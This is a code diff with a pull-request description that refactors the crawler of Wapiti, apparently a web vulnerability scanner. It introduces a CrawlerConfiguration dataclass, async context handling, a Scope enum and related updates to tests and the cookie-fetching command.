-    payload = [__ async for __ in persister.get_payloads()][0]
-    assert naughty_file == payload.evil_request
-    assert payload.parameter == "calendar"
-    assert len([__ async for __ in persister.get_forms(path="http://httpbin.org/post")]) == 2
-    await crawler.close()
+        await persister.add_payload(
+            1,  # request_id
+            "vulnerability",  # payload_type
+            "exec",  # module
+            "Command Execution",  # category
+            1,  # level
+            naughty_file,  # request
+            "calendar",  # parameter
+            "<xml>XXE there</xml>"  # info
+        )
+        payload = [__ async for __ in persister.get_payloads()][0]
+        assert naughty_file == payload.evil_request
+        assert payload.parameter == "calendar"
+        assert len([__ async for __ in persister.get_forms(path="http://httpbin.org/post")]) == 2
 
 
 @pytest.mark.asyncio

--- a/wapitiCore/main/getcookie.py
+++ b/wapitiCore/main/getcookie.py
@@ -23,6 +23,7 @@ import sys
 
 from wapitiCore.net import jsoncookie
 from wapitiCore.net.crawler import AsyncCrawler
+from wapitiCore.net.crawler_configuration import CrawlerConfiguration
 from wapitiCore.language.language import _
 from wapitiCore.net.web import Request
 
@@ -109,98 +110,103 @@ async def getcookie_main(arguments):
         sys.exit()
 
     server = parts.netloc
-    base = urlunparse((parts.scheme, parts.netloc, parts.path, '', '', ''))
+    base_url = urlunparse((parts.scheme, parts.netloc, parts.path, '', '', ''))
+    crawler_configuration = CrawlerConfiguration(Request(base_url))
 
-    crawler = AsyncCrawler(Request(base))
+    # crawler = AsyncCrawler(Request(base))
 
     if args.proxy:
         proxy_parts = urlparse(args.proxy)
         if proxy_parts.scheme and proxy_parts.netloc:
             if proxy_parts.scheme.lower() in ("http", "https", "socks", "socks5"):
-                crawler.set_proxy(args.proxy)
+                crawler_configuration.proxy = args.proxy
 
     if args.tor:
-        crawler.set_proxy("socks5://127.0.0.1:9050/")
+        crawler_configuration.proxy = "socks5://127.0.0.1:9050/"
 
     if "user_agent" in args:
-        crawler.add_custom_header("user-agent", args.user_agent)
+        crawler_configuration.user_agent = args.user_agent
 
     if "credentials" in args:
         if "%" in args.credentials:
-            crawler.credentials = args.credentials.split("%", 1)
+            crawler_configuration.auth_credentials = args.credentials.split("%", 1)
         else:
             raise InvalidOptionValue("-a", args.credentials)
 
     if "auth_type" in args:
-        crawler.auth_method = args.auth_type
+        crawler_configuration.auth_method = args.auth_type
 
+    headers = {}
     for custom_header in args.headers:
         if ":" in custom_header:
             hdr_name, hdr_value = custom_header.split(":", 1)
-            crawler.add_custom_header(hdr_name.strip(), hdr_value.strip())
+            headers[hdr_name.strip()] = hdr_value.strip()
+
+    if headers:
+        crawler_configuration.headers = headers
 
     # Open or create the cookie file and delete previous cookies from this server
     json_cookie = jsoncookie.JsonCookie()
     json_cookie.load(args.cookie)
     json_cookie.delete(server)
 
-    page = await crawler.async_get(Request(args.url), follow_redirects=True)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        page = await crawler.async_get(Request(args.url), follow_redirects=True)
 
-    # A first crawl is sometimes necessary, so let's fetch the webpage
-    json_cookie.addcookies(crawler.session_cookies)
-
-    if not args.data:
-        # Not data specified, try interactive mode by fetching forms
-        forms = []
-        for i, form in enumerate(page.iter_forms(autofill=False)):
-            if i == 0:
-                print('')
-                print(_("Choose the form you want to use or enter 'q' to leave :"))
-            print(f"{i}) {form}")
-            forms.append(form)
-
-        valid_choice_done = False
-        if forms:
-            nchoice = -1
-            print('')
-            while not valid_choice_done:
-                choice = input(_("Enter a number : "))
-                if choice.isdigit():
-                    nchoice = int(choice)
-                    if len(forms) > nchoice >= 0:
-                        valid_choice_done = True
-                elif choice == 'q':
-                    break
-
-            if valid_choice_done:
-                form = forms[nchoice]
-                print('')
-                print(_("Please enter values for the following form: "))
-                print(_("url = {0}").format(form.url))
-
-                post_params = form.post_params
-                for i, post_param_tuple in enumerate(post_params):
-                    field, value = post_param_tuple
-                    if value:
-                        new_value = input(field + " (" + value + ") : ")
-                        if not new_value:
-                            new_value = value
-                    else:
-                        new_value = input(f"{field}: ")
-                    post_params[i] = [field, new_value]
-
-                request = Request(form.url, post_params=post_params)
-                await crawler.async_send(request, follow_redirects=True)
-
-                json_cookie.addcookies(crawler.session_cookies)
-    else:
-        request = Request(args.url, post_params=args.data)
-        await crawler.async_send(request, follow_redirects=True)
-
+        # A first crawl is sometimes necessary, so let's fetch the webpage
         json_cookie.addcookies(crawler.session_cookies)
 
-    await crawler.close()
-    json_cookie.dump()
+        if not args.data:
+            # Not data specified, try interactive mode by fetching forms
+            forms = []
+            for i, form in enumerate(page.iter_forms(autofill=False)):
+                if i == 0:
+                    print('')
+                    print(_("Choose the form you want to use or enter 'q' to leave :"))
+                print(f"{i}) {form}")
+                forms.append(form)
+
+            valid_choice_done = False
+            if forms:
+                nchoice = -1
+                print('')
+                while not valid_choice_done:
+                    choice = input(_("Enter a number : "))
+                    if choice.isdigit():
+                        nchoice = int(choice)
+                        if len(forms) > nchoice >= 0:
+                            valid_choice_done = True
+                    elif choice == 'q':
+                        break
+
+                if valid_choice_done:
+                    form = forms[nchoice]
+                    print('')
+                    print(_("Please enter values for the following form: "))
+                    print(_("url = {0}").format(form.url))
+
+                    post_params = form.post_params
+                    for i, post_param_tuple in enumerate(post_params):
+                        field, value = post_param_tuple
+                        if value:
+                            new_value = input(field + " (" + value + ") : ")
+                            if not new_value:
+                                new_value = value
+                        else:
+                            new_value = input(f"{field}: ")
+                        post_params[i] = [field, new_value]
+
+                    request = Request(form.url, post_params=post_params)
+                    await crawler.async_send(request, follow_redirects=True)
+
+                    json_cookie.addcookies(crawler.session_cookies)
+        else:
+            request = Request(args.url, post_params=args.data)
+            await crawler.async_send(request, follow_redirects=True)
+
+            json_cookie.addcookies(crawler.session_cookies)
+
+        json_cookie.dump()
 
 
 def getcookie_asyncio_wrapper():

--- a/wapitiCore/net/__init__.py
+++ b/wapitiCore/net/__init__.py
@@ -1,5 +1,6 @@
 from urllib.parse import quote, unquote
 import html
+from enum import Enum
 
 
 def encode(params_list):
@@ -21,3 +22,11 @@ def uqe(self, params_list):  # , encoding = None):
 def escape(url):
     """Change special characters in their html entities representation."""
     return html.escape(url, quote=True).replace("'", "%27")
+
+
+class Scope(Enum):
+    FOLDER = 1
+    PAGE = 2
+    URL = 3
+    DOMAIN = 4
+    PUNK = 5

--- a/wapitiCore/net/crawler_configuration.py
+++ b/wapitiCore/net/crawler_configuration.py
@@ -1,0 +1,25 @@
+from typing import Union, Dict
+from dataclasses import dataclass
+from http.cookiejar import CookieJar
+
+from wapitiCore.net.web import Request
+from wapitiCore.net import Scope
+
+DEFAULT_UA = "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0"
+
+
+@dataclass
+class CrawlerConfiguration:
+    base_request: Request
+    timeout: float = 10.0
+    secure: bool = False
+    compression: bool = True
+    scope: Scope = Scope.FOLDER
+    user_agent: str = DEFAULT_UA
+    proxy: str = None
+    auth_credentials: tuple = tuple()
+    auth_method: str = "basic"
+    cookies: Union[Dict, CookieJar] = None
+    stream: bool = False
+    headers: dict = None
+    drop_cookies: bool = False

--- a/wapitiCore/net/explorer.py
+++ b/wapitiCore/net/explorer.py
@@ -309,16 +309,15 @@ class Explorer:
                 async with self._shared_lock:
                     self._pattern_counts[request.pattern] += 1
 
-            if request.link_depth == self._max_depth:
-                # We are at the edge of the depth so next links will have depth + 1 so to need to parse the page.
-                await page.close()
-                return True, [], page
-
             # Above this line we need the content of the page. As we are in stream mode we must force reading the body.
             try:
                 await page.read()
             finally:
                 await page.close()
+
+            if request.link_depth == self._max_depth:
+                # We are at the edge of the depth so next links will have depth + 1 so to need to parse the page.
+                return True, [], page
 
             # Sur les ressources statiques le content-length est généralement indiqué
             if self._max_page_size > 0:

--- a/wapitiCore/net/explorer.py
+++ b/wapitiCore/net/explorer.py
@@ -293,7 +293,7 @@ class Explorer:
             resource_url = request.url
 
             try:
-                page = await self._crawler.async_send(request)
+                page = await self._crawler.async_send(request, stream=True)
             except (TypeError, UnicodeDecodeError) as exception:
                 logging.debug(f"{exception} with url {resource_url}")  # debug
                 return False, [], None
@@ -359,8 +359,6 @@ class Explorer:
                         self._regexes.append(wildcard_translate(bad_request))
                     elif isinstance(bad_request, web.Request):
                         self._processed_requests.append(bad_request)
-
-        self._crawler.stream = True
 
         if self._max_depth < 0:
             return
@@ -454,5 +452,3 @@ class Explorer:
 
             if not task_to_request and (self._stopped.is_set() or not to_explore):
                 break
-
-        self._crawler.stream = False


### PR DESCRIPTION
Several issues pour AsyncCrawler class:

- lack of context (`with` statement) leads to crawler not be closed properly if not used correctly
- init is complicated with setters because the wrapped httpx's client class use all parameters at once (so we have to reinstantiate the client if we allow configuration change)
- most of the getter are not used on `AsyncCrawler`
- let's hide most of the HTTP only stuff (that we want to only see once like loaded cookies, auth credentials, etc)

PR fix this with:
- CrawlerConfiguration class allowing to set all config on this new class then pass it to the AsyncCrawler
- Context will automatically close the httpx client if used with `async with`
- Still possible to use init directly but then it is waiting for a configured httpx client instance